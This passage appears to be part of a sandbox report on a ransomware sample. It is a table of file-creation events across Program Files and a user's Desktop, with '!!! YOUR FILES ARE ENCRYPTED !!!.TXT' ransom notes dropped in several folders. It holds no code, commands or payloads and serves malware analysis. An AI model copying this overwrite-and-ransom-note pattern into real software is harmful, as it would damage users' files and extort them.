| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\xiUKv.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\CircleSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\highlight.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\NavigationButtonSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\NextMenuButtonIcon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\ParentMenuButtonIcon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\PreviousMenuButtonIcon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha1.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha2.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainBackground.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainBackground_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToScenesBackground.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToScenesBackground_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsNotesBackground.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsNotesBackground_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\sports_disc_mask.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ZpFl53FhUZWvTmzGO.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576black.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576_91n92.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\15x15dot.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720x480icongraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720_480shadow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\photograph.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-highlight.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-image-inset.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-back-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-next-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-previous-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-bullet.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-highlight.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\content-background.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_vjCvn7YEhbszd.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\-yeC580iAmxs.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\!!! YOUR FILES ARE ENCRYPTED !!!.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\header-background.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passportcover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\PassportMask.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\PassportMask_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport_mask_left.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport_mask_right.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\Passport_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\play-background.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\selection_subpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\travel.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMainMask.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMainMask_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\203x8subpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\videowall.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\cSnf.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ctSfaOF2nu_3Iug.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\1047x576black.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\15x15dot.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\softedges.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\vignettemask25.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\whiteband.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\GM24uvlDX4d23gnf.swf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\XeKZ1lckwCS6l.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\!!! YOUR FILES ARE ENCRYPTED !!!.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\0S0ya1lf.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\!!! YOUR FILES ARE ENCRYPTED !!!.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\3aNP40yASecb0.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\80 K90vK.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\D kR5epoSNcxyM_AME73.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\E6fI.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\NJ jir0c hBFN8.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\o4XOe7.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\RjQLaKs8b3A4.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\_onGBYzZ_yVXka.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\!!! YOUR FILES ARE ENCRYPTED !!!.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\- t6YX67FJjNzE.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\!!! YOUR FILES ARE ENCRYPTED !!!.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\D3fZ-WqBjG.flv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\whole_eg.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\d3sOR gctCdkgmAa.swf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00004_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\!!! YOUR FILES ARE ENCRYPTED !!!.TXT | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\J1J_05qqT.mkv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00011_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\msHrJviis.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00021_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\UMuPxsNP6UswBKnIxz.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00037_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\VeyN3H.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\ZHkOWx.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00040_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00052_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00057_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00090_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00092_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00103_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00120_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00126_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00129_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00130_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00135_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00139_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00142_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00154_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00157_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00158_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00160_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00163_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00164_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00165_.GIF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
